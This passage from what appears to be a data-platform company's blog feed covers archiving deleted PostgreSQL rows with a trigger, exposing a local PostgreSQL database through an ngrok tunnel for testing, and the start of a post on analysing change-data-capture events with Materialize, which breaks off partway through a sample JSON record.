&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Deleted_User&quot;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;WITH&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;NO&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DATA&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: &lt;code class=&quot;language-text&quot;&gt;WITH NO DATA&lt;/code&gt; copies a table’s structure without its data.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step Two: Create a new Postgres Function&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Next, we can create a new function named &lt;code class=&quot;language-text&quot;&gt;moveDeleted()&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;FUNCTION&lt;/span&gt; moveDeleted&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;RETURNS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;trigger&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; $$
	&lt;span class=&quot;token keyword&quot;&gt;BEGIN&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Deleted_User&quot;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;VALUES&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;OLD&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;RETURN&lt;/span&gt; OLD&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;END&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
$$ &lt;span class=&quot;token keyword&quot;&gt;LANGUAGE&lt;/span&gt; plpgsql&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here, &lt;code class=&quot;language-text&quot;&gt;VALUES((OLD).*)&lt;/code&gt; copies every column of the deleted row into the archive table; you can modify the &lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt; to omit columns or add new ones.&lt;/p&gt;
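&lt;p&gt;For example, a common variation is to record when the delete happened. This is only a sketch: it assumes you have added a hypothetical &lt;code class=&quot;language-text&quot;&gt;deleted_at&lt;/code&gt; column to the archive table, as shown here:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;ALTER TABLE &quot;Deleted_User&quot; ADD COLUMN deleted_at timestamptz;

CREATE OR REPLACE FUNCTION moveDeleted() RETURNS trigger AS $$
	BEGIN
		-- (OLD).* expands to the deleted row&apos;s columns; now() fills deleted_at
		INSERT INTO &quot;Deleted_User&quot; VALUES((OLD).*, now());
		RETURN OLD;
	END;
$$ LANGUAGE plpgsql;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;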
&lt;h3&gt;&lt;strong&gt;Step Three: Create a new Postgres Trigger&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Lastly, we can create a Postgres Trigger named &lt;code class=&quot;language-text&quot;&gt;moveDeleted&lt;/code&gt; that calls the &lt;code class=&quot;language-text&quot;&gt;moveDeleted()&lt;/code&gt; function:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TRIGGER&lt;/span&gt; moveDeleted
BEFORE &lt;span class=&quot;token keyword&quot;&gt;DELETE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;FOR EACH ROW&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;EXECUTE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;PROCEDURE&lt;/span&gt; moveDeleted&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That’s it.&lt;/p&gt;
&lt;p&gt;If you perform a &lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operation on the &lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table, the deleted row will be inserted into the &lt;code class=&quot;language-text&quot;&gt;Deleted_User&lt;/code&gt; table.&lt;/p&gt;
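&lt;p&gt;You can verify the trigger with a quick test (assuming, for illustration, that a row with &lt;code class=&quot;language-text&quot;&gt;id&lt;/code&gt; 11 exists in &lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt;):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;-- The BEFORE DELETE trigger fires and archives the row first
DELETE FROM &quot;User&quot; WHERE id = 11;

-- The deleted row is preserved in the archive table
SELECT * FROM &quot;Deleted_User&quot; WHERE id = 11;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;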
&lt;p&gt;Now your archive table will begin to populate, data won’t be lost, and you can now monitor the archive table to capture&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations within your application.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How to Expose PostgreSQL Remotely Using ngrok]]></title><description><![CDATA[Learn how to expose PostgreSQL Remotely Using ngrok. This method allows you to quickly test and analyze the behavior of PostgreSQL with Meroxa.]]></description><link>https://meroxa.com/blog/how-to-expose-postgresql-remotely-using-ngrok</link><guid isPermaLink="false">https://meroxa.com/blog/how-to-expose-postgresql-remotely-using-ngrok</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Mon, 10 May 2021 15:58:00 GMT</pubDate><content:encoded>&lt;p&gt;In this guide, we will walk through exposing a local PostgreSQL instance with&lt;a href=&quot;https://ngrok.com/&quot;&gt;ngrok&lt;/a&gt;. This method allows you to quickly test and analyze the behavior of PostgreSQL with data platforms like&lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt;.&lt;img src=&quot;https://docs.meroxa.com/assets/images/add-local-pg-meroxa-e37eeb50cf2560f9d1d7b3ee618e738e.png&quot; alt=&quot;Add Local PG&quot;&gt;For this example, we are going to use ngrok. ngrok exposes local servers behind NATs and firewalls to the public internet over secure tunnels.&lt;/p&gt;
&lt;p&gt;Let&apos;s begin.&lt;/p&gt;
&lt;h3&gt;Step One: Running PostgreSQL Locally&lt;/h3&gt;
&lt;p&gt;Before we begin, you&apos;ll need to have &lt;a href=&quot;https://www.postgresql.org/download/&quot;&gt;PostgreSQL installed and running locally&lt;/a&gt;. The easiest and quickest way is to use &lt;a href=&quot;https://docs.docker.com/get-docker/&quot;&gt;Docker&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token parameter variable&quot;&gt;--rm&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt;:5432 &lt;span class=&quot;token parameter variable&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;secret &lt;span class=&quot;token parameter variable&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;POSTGRES_DB&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;demo postgres&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/run-postgres-e475a173c89d144c86da903525cb0da9.png&quot; alt=&quot;Run Postgres&quot;&gt;&lt;/p&gt;
&lt;p&gt;For more details on configuration, see &lt;a href=&quot;https://hub.docker.com/_/postgres&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;postgres&lt;/code&gt; on Docker Hub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now that PostgreSQL is running on port &lt;code class=&quot;language-text&quot;&gt;5432&lt;/code&gt;, you can connect to the local database from &lt;em&gt;outside&lt;/em&gt; of the container using &lt;a href=&quot;https://www.postgresql.org/docs/13/app-psql.html&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;psql&lt;/code&gt;&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;psql &lt;span class=&quot;token parameter variable&quot;&gt;-U&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-h&lt;/span&gt; localhost &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt; postgres&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Step Two: Running ngrok and Exposing PostgreSQL&lt;/h3&gt;
&lt;p&gt;Next, we can create a tunnel using ngrok and expose the locally running database.&lt;/p&gt;
&lt;p&gt;First, you&apos;ll need to&lt;a href=&quot;https://ngrok.com/download&quot;&gt;download and install ngrok&lt;/a&gt;, and&lt;a href=&quot;https://dashboard.ngrok.com/&quot;&gt;create an account&lt;/a&gt;. Then, you can start the tunnel by running the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;ngrok tcp &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/run-ngrok-4b81e2495a91b50f5cefe6687696b8ce.png&quot; alt=&quot;Run Ngrok&quot;&gt;&lt;/p&gt;
&lt;p&gt;For more information, see&lt;a href=&quot;https://ngrok.com/docs#tcp&quot;&gt;ngrok tcp&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Note: You&apos;ll need to create an ngrok account to use TCP forwarding.&lt;/p&gt;
&lt;h3&gt;Step Three: Connecting to PostgreSQL&lt;a href=&quot;https://docs.meroxa.com/guides/how-to-expose-postgresql-remotely-using-ngrok#step-three-connecting-to-postgresql&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Now that PostgreSQL &lt;em&gt;and&lt;/em&gt; ngrok are running, you can connect to the publicly exposed database using &lt;code class=&quot;language-text&quot;&gt;psql&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;psql &lt;span class=&quot;token parameter variable&quot;&gt;-h&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;.tcp.ngrok.io &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;17618&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-U&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; postgres&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/run-psql-ngrok-a47095834213073aec9908f5871bdce9.png&quot; alt=&quot;Run Postgres&quot;&gt;That&apos;s it! You can now connect to your local instance over the internet.&lt;/p&gt;
&lt;h3&gt;What&apos;s next?&lt;a href=&quot;https://docs.meroxa.com/guides/how-to-expose-postgresql-remotely-using-ngrok#whats-next&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This method is super helpful for quickly testing and analyzing PostgreSQL&apos;s behavior with cloud services. For example, you can add the local PostgreSQL instance to Meroxa:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create localpg &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://postgres:secret@8.tcp.ngrok.io:19272/demo?sslmode=disable&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Since our database is local, SSL is not enabled by default. To connect, you&apos;ll need to append &lt;code class=&quot;language-text&quot;&gt;?sslmode=disable&lt;/code&gt; to the PostgreSQL connection URL.&lt;/p&gt;
&lt;p&gt;By adding it as a Meroxa Resource, you can easily capture real-time CDC events for every insert, update, and delete operation on a local PostgreSQL table. For more, see the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL Resource Documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Helpful Resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.postgresql.org/download/&quot;&gt;Install PostgreSQL Locally&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://ngrok.com/docs#getting-started&quot;&gt;Getting Started with ngrok&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/anderspitman/awesome-tunneling&quot;&gt;Alternative tunneling solutions&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can&apos;t wait to see what you build 🚀.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Analyze Change Data Capture from PostgreSQL with Meroxa and Materialize]]></title><description><![CDATA[Analyzing the changes that occur to PostgreSQL will give you insight into the current state of the data and allows you to dig into the changes of your database.]]></description><link>https://meroxa.com/blog/analyze-change-data-capture-from-postgresql-with-meroxa-and-materialize</link><guid isPermaLink="false">https://meroxa.com/blog/analyze-change-data-capture-from-postgresql-with-meroxa-and-materialize</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Wed, 05 May 2021 19:47:00 GMT</pubDate><content:encoded>&lt;p&gt;Analyzing the changes that occur to PostgreSQL will not only give you insight into the current state of the data within your application but also let you dig into the &lt;em&gt;changes&lt;/em&gt; of your database.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://materialize.com/&quot;&gt;Materialize&lt;/a&gt; is a streaming database that allows you to query real-time streams using SQL.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; is a platform that enables you to build real-time data pipelines that capture Change Data Capture (CDC) events (every insert, update, and delete) from PostgreSQL and other &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;sources&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Together, you can create real-time pipelines in Meroxa to stream data from various sources to Materialize and analyze it using &lt;a href=&quot;https://materialize.com/streaming-sql-intro/&quot;&gt;Streaming SQL&lt;/a&gt;. The model described in this post offers a robust foundation for a streaming analytics stack.&lt;/p&gt;
&lt;h3&gt;How it works&lt;/h3&gt;
&lt;p&gt;For this example, we will build a query (a &lt;a href=&quot;https://materialize.com/docs/overview/what-is-materialize/#sql--views&quot;&gt;materialized view&lt;/a&gt;) that counts the operations (inserts, updates, and deletes) performed against Postgres.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*p0DcOgfBk__f2OfBDyJWBw.gif&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;From a high level, here is how it works:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;First, we build a pipeline to capture CDC events (inserts, updates, and deletes) from a PostgreSQL database and stream the events to Amazon S3.&lt;/li&gt;
&lt;li&gt;Then, add Amazon S3 as a materialized source and build a &lt;em&gt;materialized view&lt;/em&gt; to analyze the CDC events.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*Qj0eBtOg7eAvuQWq80r3gg.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The CDC events are streamed to files within a configured S3 bucket as gzipped JSON. Each S3 object contains multiple records, separated by newlines, in the following format:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;struct&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;fields&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;struct&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;fields&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
          &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int32&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
          &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
          &lt;span class=&quot;token string-property property&quot;&gt;&quot;field&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
          &lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;field&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;before&quot;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;resource_217&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;before&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;11&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;ec@example.com&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Nell Abbott&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;birthday&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;12/21/1959&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;createdAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255874536&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;updatedAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255874537&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;11&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;nell-abbott@example.com&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Nell Abbott&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;birthday&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;12/21/1959&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;createdAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255874536&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;updatedAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255874537&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;source&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;version&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1.2.5.Final&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;connector&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
